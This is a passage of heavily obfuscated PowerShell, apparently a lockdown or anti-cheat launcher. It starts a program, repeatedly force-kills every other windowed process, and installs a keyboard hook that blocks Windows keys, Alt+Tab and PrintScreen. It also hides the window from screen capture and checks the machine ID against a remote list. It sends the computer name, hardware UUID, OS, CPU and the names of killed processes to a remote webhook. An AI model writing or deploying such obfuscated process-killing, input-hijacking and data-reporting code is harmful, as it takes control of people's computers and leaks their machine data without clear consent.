$JiRXrUdYJfeO = -join @($UFWPQCoizQlt[303], $UFWPQCoizQlt[347], $UFWPQCoizQlt[637], $UFWPQCoizQlt[14], $UFWPQCoizQlt[108], $UFWPQCoizQlt[260], $UFWPQCoizQlt[474], $UFWPQCoizQlt[333], $UFWPQCoizQlt[73], $UFWPQCoizQlt[340], $UFWPQCoizQlt[350], $UFWPQCoizQlt[329], $UFWPQCoizQlt[52], $UFWPQCoizQlt[653], $UFWPQCoizQlt[690], $UFWPQCoizQlt[598], $UFWPQCoizQlt[238], $UFWPQCoizQlt[566], $UFWPQCoizQlt[552], $UFWPQCoizQlt[150])
$YOIKcOqDbXeP = -join @($UFWPQCoizQlt[509], $UFWPQCoizQlt[136], $UFWPQCoizQlt[398], $UFWPQCoizQlt[226], $UFWPQCoizQlt[453], $UFWPQCoizQlt[286], $UFWPQCoizQlt[434], $UFWPQCoizQlt[643])
$mRIRBtfcRqNV = xYEfLAHsaMBd $JiRXrUdYJfeO $YOIKcOqDbXeP
$BpqAlFQtmwoA = -join @($UFWPQCoizQlt[322], $UFWPQCoizQlt[704], $UFWPQCoizQlt[54], $UFWPQCoizQlt[368], $UFWPQCoizQlt[11], $UFWPQCoizQlt[316], $UFWPQCoizQlt[378])
$pVHmdUKTOUkE = -join @($UFWPQCoizQlt[525], $UFWPQCoizQlt[6], $UFWPQCoizQlt[486], $UFWPQCoizQlt[301], $UFWPQCoizQlt[692], $UFWPQCoizQlt[419], $UFWPQCoizQlt[221], $UFWPQCoizQlt[375])
$RztzwkkTCCZe = xYEfLAHsaMBd $BpqAlFQtmwoA $pVHmdUKTOUkE
$FLAFhWMWObSm = -join @($UFWPQCoizQlt[550], $UFWPQCoizQlt[424], $UFWPQCoizQlt[535])
$GfoMWkuEGmUq = -join @($UFWPQCoizQlt[684], $UFWPQCoizQlt[361], $UFWPQCoizQlt[209], $UFWPQCoizQlt[639], $UFWPQCoizQlt[91], $UFWPQCoizQlt[536], $UFWPQCoizQlt[669], $UFWPQCoizQlt[709])
$WIsDzUeMIuEl = xYEfLAHsaMBd $FLAFhWMWObSm $GfoMWkuEGmUq
$cYfxBaMJgcFd = -join @($UFWPQCoizQlt[185], $UFWPQCoizQlt[538], $UFWPQCoizQlt[596], $UFWPQCoizQlt[307], $UFWPQCoizQlt[287])
$ZnqfCWOeAUNe = -join @($UFWPQCoizQlt[313], $UFWPQCoizQlt[679], $UFWPQCoizQlt[354], $UFWPQCoizQlt[416], $UFWPQCoizQlt[724], $UFWPQCoizQlt[607], $UFWPQCoizQlt[502], $UFWPQCoizQlt[699])
$YekcWqWKNEmO = xYEfLAHsaMBd $cYfxBaMJgcFd $ZnqfCWOeAUNe
$GVUVrYzzsMFB = -join @($UFWPQCoizQlt[476], $UFWPQCoizQlt[349], $UFWPQCoizQlt[207], $UFWPQCoizQlt[2])
$SxACwEzSjlOf = -join @($UFWPQCoizQlt[461], $UFWPQCoizQlt[22], $UFWPQCoizQlt[685], $UFWPQCoizQlt[35], $UFWPQCoizQlt[105], $UFWPQCoizQlt[588], $UFWPQCoizQlt[597], $UFWPQCoizQlt[320])
$xcdjQhfFTXAd = xYEfLAHsaMBd $GVUVrYzzsMFB $SxACwEzSjlOf
$XCZDeqctQxGI = -join @($UFWPQCoizQlt[311], $UFWPQCoizQlt[235])
$GWBHLBdZFymr = -join @($UFWPQCoizQlt[432], $UFWPQCoizQlt[498], $UFWPQCoizQlt[668], $UFWPQCoizQlt[173], $UFWPQCoizQlt[93], $UFWPQCoizQlt[459], $UFWPQCoizQlt[655], $UFWPQCoizQlt[24])
$QoDWGwnIXcSR = xYEfLAHsaMBd $XCZDeqctQxGI $GWBHLBdZFymr
$fseWSlYIpQYs = -join @($UFWPQCoizQlt[677], $UFWPQCoizQlt[490], $UFWPQCoizQlt[372])
$kJgntCmUCEqP = -join @($UFWPQCoizQlt[79], $UFWPQCoizQlt[577], $UFWPQCoizQlt[586], $UFWPQCoizQlt[554], $UFWPQCoizQlt[131], $UFWPQCoizQlt[373], $UFWPQCoizQlt[736], $UFWPQCoizQlt[510])
$aBaKGyzbqfXF = xYEfLAHsaMBd $fseWSlYIpQYs $kJgntCmUCEqP
$XNfDvYXRZrgt = -join @($UFWPQCoizQlt[730], $UFWPQCoizQlt[614], $UFWPQCoizQlt[37])
$CjCzFNoUdmwr = -join @($UFWPQCoizQlt[213], $UFWPQCoizQlt[644], $UFWPQCoizQlt[381], $UFWPQCoizQlt[551], $UFWPQCoizQlt[25], $UFWPQCoizQlt[230], $UFWPQCoizQlt[247], $UFWPQCoizQlt[621])
$EAIpLmeWYvXg = xYEfLAHsaMBd $XNfDvYXRZrgt $CjCzFNoUdmwr
$jXVWtcKxBayR = -join @($UFWPQCoizQlt[87])
$YFbBfANuFiGC = -join @($UFWPQCoizQlt[48], $UFWPQCoizQlt[117], $UFWPQCoizQlt[271], $UFWPQCoizQlt[507], $UFWPQCoizQlt[138], $UFWPQCoizQlt[80], $UFWPQCoizQlt[43], $UFWPQCoizQlt[582])
$sjHXtuIoxLdl = xYEfLAHsaMBd $jXVWtcKxBayR $YFbBfANuFiGC
$aPIAtMEvGEPr = -join @($UFWPQCoizQlt[591], $UFWPQCoizQlt[318], $UFWPQCoizQlt[501], $UFWPQCoizQlt[583])
$frIEVMNJrlPl = -join @($UFWPQCoizQlt[55], $UFWPQCoizQlt[339], $UFWPQCoizQlt[599], $UFWPQCoizQlt[590], $UFWPQCoizQlt[296], $UFWPQCoizQlt[277], $UFWPQCoizQlt[242], $UFWPQCoizQlt[512])
$aOldueYORtLb = xYEfLAHsaMBd $aPIAtMEvGEPr $frIEVMNJrlPl
$DNOhgwclaJrr = -join @($UFWPQCoizQlt[506], $UFWPQCoizQlt[471], $UFWPQCoizQlt[457])
$MwwHuTJFwzSx = -join @($UFWPQCoizQlt[445], $UFWPQCoizQlt[376], $UFWPQCoizQlt[265], $UFWPQCoizQlt[387], $UFWPQCoizQlt[18], $UFWPQCoizQlt[151], $UFWPQCoizQlt[92], $UFWPQCoizQlt[153])
$QQcPAfwkVdyE = xYEfLAHsaMBd $DNOhgwclaJrr $MwwHuTJFwzSx
$RwXSqpEBhrpb = -join @($UFWPQCoizQlt[482], $UFWPQCoizQlt[77], $UFWPQCoizQlt[44], $UFWPQCoizQlt[309], $UFWPQCoizQlt[306])
$RGiqBaiTKzhF = -join @($UFWPQCoizQlt[532], $UFWPQCoizQlt[523], $UFWPQCoizQlt[137], $UFWPQCoizQlt[695], $UFWPQCoizQlt[68], $UFWPQCoizQlt[250], $UFWPQCoizQlt[397], $UFWPQCoizQlt[417])
$mbcTJjaUtQPS = xYEfLAHsaMBd $RwXSqpEBhrpb $RGiqBaiTKzhF
$qELtxPuHFLXr = -join @($UFWPQCoizQlt[524], $UFWPQCoizQlt[516], $UFWPQCoizQlt[712])
$KnVdOHyhxltL = -join @($UFWPQCoizQlt[325], $UFWPQCoizQlt[58], $UFWPQCoizQlt[305], $UFWPQCoizQlt[573], $UFWPQCoizQlt[430], $UFWPQCoizQlt[276], $UFWPQCoizQlt[353], $UFWPQCoizQlt[657])
$qDQfXzWmlKXg = xYEfLAHsaMBd $qELtxPuHFLXr $KnVdOHyhxltL
$jgirvsppDOXG = -join @($UFWPQCoizQlt[171], $UFWPQCoizQlt[608], $UFWPQCoizQlt[34], $UFWPQCoizQlt[99], $UFWPQCoizQlt[734], $UFWPQCoizQlt[336], $UFWPQCoizQlt[426])
$suxeiJuDFTdu = -join @($UFWPQCoizQlt[388], $UFWPQCoizQlt[334], $UFWPQCoizQlt[132], $UFWPQCoizQlt[366], $UFWPQCoizQlt[8], $UFWPQCoizQlt[666], $UFWPQCoizQlt[545], $UFWPQCoizQlt[155])
$oFdVNFKloKxG = xYEfLAHsaMBd $jgirvsppDOXG $suxeiJuDFTdu
$HIYhcHvMVBhR = -join @($UFWPQCoizQlt[409], $UFWPQCoizQlt[227], $UFWPQCoizQlt[604])
$cqIMQMUlwGMz = -join @($UFWPQCoizQlt[630], $UFWPQCoizQlt[15], $UFWPQCoizQlt[275], $UFWPQCoizQlt[197], $UFWPQCoizQlt[269], $UFWPQCoizQlt[548], $UFWPQCoizQlt[118], $UFWPQCoizQlt[572])
$dpUpYyQcGNIy = xYEfLAHsaMBd $HIYhcHvMVBhR $cqIMQMUlwGMz
$RRSIxkZUarhX = -join @($UFWPQCoizQlt[145])
$cqmumOPiZswi = -join @($UFWPQCoizQlt[101], $UFWPQCoizQlt[465], $UFWPQCoizQlt[194], $UFWPQCoizQlt[183], $UFWPQCoizQlt[200], $UFWPQCoizQlt[357], $UFWPQCoizQlt[674], $UFWPQCoizQlt[65])
$JYEBsTgwwYeg = xYEfLAHsaMBd $RRSIxkZUarhX $cqmumOPiZswi
$ZaZSGzmwcTBI = -join @($UFWPQCoizQlt[546], $UFWPQCoizQlt[696])
$DPKuDzPFyMJR = -join @($UFWPQCoizQlt[404], $UFWPQCoizQlt[74], $UFWPQCoizQlt[319], $UFWPQCoizQlt[240], $UFWPQCoizQlt[100], $UFWPQCoizQlt[714], $UFWPQCoizQlt[708], $UFWPQCoizQlt[16])
$rSeZDHwlOAud = xYEfLAHsaMBd $ZaZSGzmwcTBI $DPKuDzPFyMJR
$kOZZsEwHKBhy = -join @($UFWPQCoizQlt[218], $UFWPQCoizQlt[652], $UFWPQCoizQlt[567])
$mDWoFjRjwCbw = -join @($UFWPQCoizQlt[195], $UFWPQCoizQlt[72], $UFWPQCoizQlt[7], $UFWPQCoizQlt[526], $UFWPQCoizQlt[331], $UFWPQCoizQlt[49], $UFWPQCoizQlt[475], $UFWPQCoizQlt[612])
$mfKFAeoIfaQh = xYEfLAHsaMBd $kOZZsEwHKBhy $mDWoFjRjwCbw
$fBnfgHYGKUEL = -join @($UFWPQCoizQlt[730], $UFWPQCoizQlt[342], $UFWPQCoizQlt[481], $UFWPQCoizQlt[635], $UFWPQCoizQlt[448])
$pRbUTZSvPBQT = -join @($UFWPQCoizQlt[281], $UFWPQCoizQlt[610], $UFWPQCoizQlt[182], $UFWPQCoizQlt[624], $UFWPQCoizQlt[594], $UFWPQCoizQlt[574], $UFWPQCoizQlt[181], $UFWPQCoizQlt[505])
$zokXhaNhrrlo = xYEfLAHsaMBd $fBnfgHYGKUEL $pRbUTZSvPBQT
try { $flPcoEboIdtV = $flPcoEboIdtV | ConvertFrom-Json } catch { }
$JxnpRmLSmbhK = 'using System; using System.Runtime.InteropServices; using System.Diagnostics; public class KeyBlock { private const int WH_KEYBOARD_LL = 13; private const int WM_KEYDOWN = 0x0100; private const int WM_SYSKEYDOWN = 0x0104; [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool UnhookWindowsHookEx(IntPtr hhk); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam); [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr GetModuleHandle(string lpModuleName); [DllImport("user32.dll")] public static extern IntPtr GetForegroundWindow(); [DllImport("user32.dll", SetLastError=true)] public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint processId); [DllImport("user32.dll")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); public delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam); private static LowLevelKeyboardProc _proc = HookCallback; private static IntPtr _hookID = IntPtr.Zero; public static void BlockKeys() { if (_hookID == IntPtr.Zero) { using (Process curProcess = Process.GetCurrentProcess()) using (ProcessModule curModule = curProcess.MainModule) { _hookID = SetWindowsHookEx(WH_KEYBOARD_LL, _proc, GetModuleHandle(curModule.ModuleName), 0); } } } public static void UnblockKeys() { if (_hookID != IntPtr.Zero) { UnhookWindowsHookEx(_hookID); _hookID = IntPtr.Zero; } } private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam) { if (nCode >= 0 && (wParam == (IntPtr)WM_KEYDOWN || wParam == (IntPtr)WM_SYSKEYDOWN)) { int vkCode = Marshal.ReadInt32(lParam); bool alt = (Marshal.ReadInt32(lParam, 8) & 32) != 0; if (vkCode == 91 || vkCode == 92) return (IntPtr)1; if (vkCode == 9 && alt) return (IntPtr)1; if (vkCode == 27 && alt) return (IntPtr)1; if (vkCode == 0x2C) return (IntPtr)1; } return CallNextHookEx(_hookID, nCode, wParam, lParam); } }'
try {
$QHpvKSwIGqeJ = $WIsDzUeMIuEl
try { $QHpvKSwIGqeJ = (Get-CimInstance -Class $eZhPcWQnfvDh).UUID } catch { }
try {
$GyMizrFZikhN = (Invoke-WebRequest -Uri $jKEAXejQslPz -UseBasicParsing -ErrorAction SilentlyContinue).Content
} catch { $GyMizrFZikhN = "" }
if ($GyMizrFZikhN -match $QHpvKSwIGqeJ) {
qKdRktBcgZJt $yqEreLnfxUxG $PolXUFvsCFRJ 5
exit 0
}
$iWuhBhwQSCDd = $null
try {
$iWuhBhwQSCDd = Start-Process -FilePath $TkTMePdGDTVk -ArgumentList $QKoEkPTajPQX -PassThru
} catch {
qKdRktBcgZJt $PLVtehsIpqHu $YekcWqWKNEmO 5
exit 1
}
Start-Sleep -Seconds 5
if (-not $iWuhBhwQSCDd -or $iWuhBhwQSCDd.HasExited) {
qKdRktBcgZJt $PLVtehsIpqHu $xcdjQhfFTXAd 5
exit 1
}
try {
foreach ($BIcEZrtCqmHB in $flPcoEboIdtV) {
$TlJJAvLcdoEj = $BIcEZrtCqmHB -replace "\.exe`$",""
if (Get-Process -Name $TlJJAvLcdoEj -ErrorAction SilentlyContinue) {
if ($BIcEZrtCqmHB -notmatch "\.exe`$") { $BIcEZrtCqmHB = "${v_b}.exe" }
try { taskkill /F /IM $BIcEZrtCqmHB /T 2>&1 | Out-Null } catch {}
}
}
} catch { }
if (Get-Process -Name $aBaKGyzbqfXF -ErrorAction SilentlyContinue) {
try { taskkill /F /IM $rnyyTIYIxzvI /T 2>&1 | Out-Null } catch {}
}
try {
$zFGTkNnhnsaG = @($QoDWGwnIXcSR, $EAIpLmeWYvXg, $sjHXtuIoxLdl, $aOldueYORtLb, $QQcPAfwkVdyE, $mbcTJjaUtQPS, $qDQfXzWmlKXg, $oFdVNFKloKxG, $dpUpYyQcGNIy, $JYEBsTgwwYeg, $rSeZDHwlOAud, $mfKFAeoIfaQh, $zokXhaNhrrlo)
$NwwjyXrcwPxW = Get-Process | Where-Object {
$_.MainWindowHandle -ne 0 -and
$_.ProcessName -notin $zFGTkNnhnsaG -and
$_.Id -ne $PID
}
foreach ($p in $NwwjyXrcwPxW) {
try { taskkill /F /PID $p.Id /T 2>&1 | Out-Null } catch {}
}
} catch { }
try {
Add-Type -TypeDefinition $JxnpRmLSmbhK
} catch { }
try { [KeyBlock]::BlockKeys() } catch { }
try {
$VSKhWEDdwUVx = (Get-Process -Id $iWuhBhwQSCDd.Id -ErrorAction SilentlyContinue).MainWindowHandle
if ($VSKhWEDdwUVx -ne 0) {
[KeyBlock]::SetWindowDisplayAffinity($VSKhWEDdwUVx, 0x00000011) | Out-Null
}
} catch { }
$sOcGMFAzUPXI = $env:COMPUTERNAME
$komkexYhDFyL = $WIsDzUeMIuEl
$mUxTrzUlHcnN = $WIsDzUeMIuEl
try { $komkexYhDFyL = (Get-CimInstance -Class $gAxOiuCKnaMQ).Caption } catch {}
try { $mUxTrzUlHcnN = (Get-CimInstance -Class $zoRhJAwmBwXk).Name } catch {}
$HzRtQVsSOGcb = (Get-Item $JnnHpBvrDZbL -ErrorAction SilentlyContinue).VersionInfo.ProductVersion
if (-not $HzRtQVsSOGcb) {
$HzRtQVsSOGcb = (Get-Item $mRIRBtfcRqNV -ErrorAction SilentlyContinue).VersionInfo.ProductVersion
}
if (-not $HzRtQVsSOGcb) { $HzRtQVsSOGcb = $WIsDzUeMIuEl }
$hBPlrXFxsdlS = Get-Date -Format $RztzwkkTCCZe
$wrBLiTXPUXqq = @(
@{ name = $XFjhUrcDpDpr; value = $sOcGMFAzUPXI; inline = $true }
@{ name = $jepFzxJxznWp; value = $QHpvKSwIGqeJ; inline = $true }
@{ name = $oWpbPOZlnPWp; value = $komkexYhDFyL; inline = $false }
@{ name = $fRppcdwYJDUu; value = $mUxTrzUlHcnN; inline = $false }
@{ name = $AHsmYguiOXUS; value = $HzRtQVsSOGcb; inline = $true }
@{ name = $eLbvZmhSEknC; value = $hBPlrXFxsdlS; inline = $true }
)
IRKjsmBcEfqQ $xaKPlBlGRftx $mtjqNjggsZye 3066993 $wrBLiTXPUXqq
while (-not $iWuhBhwQSCDd.HasExited) {
try {
for ($i = 0; $i -lt 50; $i++) {
[System.Windows.Forms.Application]::DoEvents()
Start-Sleep -Milliseconds 10
}
if (Get-Process -Name $aBaKGyzbqfXF -ErrorAction SilentlyContinue) {
try { taskkill /F /IM $rnyyTIYIxzvI /T 2>&1 | Out-Null } catch {}
}
try {
$NwwjyXrcwPxW = Get-Process | Where-Object {
$_.MainWindowHandle -ne 0 -and
$_.ProcessName -ne $QoDWGwnIXcSR -and
$_.ProcessName -ne $mbcTJjaUtQPS -and
$_.ProcessName -ne $qDQfXzWmlKXg -and
$_.ProcessName -ne $oFdVNFKloKxG -and
$_.ProcessName -ne $dpUpYyQcGNIy -and
$_.ProcessName -ne $JYEBsTgwwYeg -and
$_.ProcessName -ne $zokXhaNhrrlo -and
$_.Id -ne $PID
}
foreach ($p in $NwwjyXrcwPxW) {
$eFNCCUJWiMon = @(
@{ name = $XFjhUrcDpDpr; value = $sOcGMFAzUPXI; inline = $true }
@{ name = $jepFzxJxznWp; value = $QHpvKSwIGqeJ; inline = $true }
@{ name = $wbVpfPCguvXV; value = $p.ProcessName; inline = $false }
@{ name = $YGjPlBeWSfGx; value = (Get-Date -Format $RztzwkkTCCZe); inline = $false }
)
IRKjsmBcEfqQ $xaKPlBlGRftx $biXqZcyfvfxs 15158332 $eFNCCUJWiMon
try { taskkill /F /PID $p.Id /T 2>&1 | Out-Null } catch {}
}
} catch { }
$BJjuzAhNmsmF = 0
try { $BJjuzAhNmsmF = [KeyBlock]::GetForegroundWindow() } catch { }
if ($BJjuzAhNmsmF -ne 0) {
$MBzLDJnCEuqv = 0
try { [KeyBlock]::GetWindowThreadProcessId($BJjuzAhNmsmF, [ref]$MBzLDJnCEuqv) | Out-Null } catch { }
$WRPPXDPyDGvG = $null
try { $WRPPXDPyDGvG = Get-Process -Id $MBzLDJnCEuqv -ErrorAction Stop } catch {}
if ($WRPPXDPyDGvG -and
($WRPPXDPyDGvG.ProcessName -ne $QoDWGwnIXcSR) -and
($WRPPXDPyDGvG.ProcessName -ne $mbcTJjaUtQPS) -and
($WRPPXDPyDGvG.ProcessName -ne $qDQfXzWmlKXg) -and
($WRPPXDPyDGvG.ProcessName -ne $oFdVNFKloKxG) -and
($WRPPXDPyDGvG.ProcessName -ne $dpUpYyQcGNIy) -and
($WRPPXDPyDGvG.ProcessName -ne $JYEBsTgwwYeg) -and
($WRPPXDPyDGvG.ProcessName -ne $zokXhaNhrrlo) -and
($WRPPXDPyDGvG.Id -ne $PID)) {
$RxoNNgaDAdTn = @(
@{ name = $XFjhUrcDpDpr; value = $sOcGMFAzUPXI; inline = $true }
@{ name = $jepFzxJxznWp; value = $QHpvKSwIGqeJ; inline = $true }
@{ name = $UFUnJwIQDmZH; value = $WRPPXDPyDGvG.ProcessName; inline = $false }
@{ name = $YGjPlBeWSfGx; value = (Get-Date -Format $RztzwkkTCCZe); inline = $false }
)
IRKjsmBcEfqQ $xaKPlBlGRftx $YRQPvydhTNGI 15158332 $RxoNNgaDAdTn
try { taskkill /F /PID $WRPPXDPyDGvG.Id /T 2>&1 | Out-Null } catch {}
}
}
} catch { }
}
try { [KeyBlock]::UnblockKeys() } catch { }
Start-Process $rnyyTIYIxzvI
} catch {
$JgchlXirWzpj = @(
@{ name = $XFjhUrcDpDpr; value = $env:COMPUTERNAME; inline = $true }
@{ name = $JyAdHuIwpJVS; value = $_.Exception.Message; inline = $false }
@{ name = $epJLoWcCHDJA; value = $_.ScriptStackTrace; inline = $false }
)
IRKjsmBcEfqQ $xaKPlBlGRftx $PLVtehsIpqHu 16711680 $JgchlXirWzpj
}
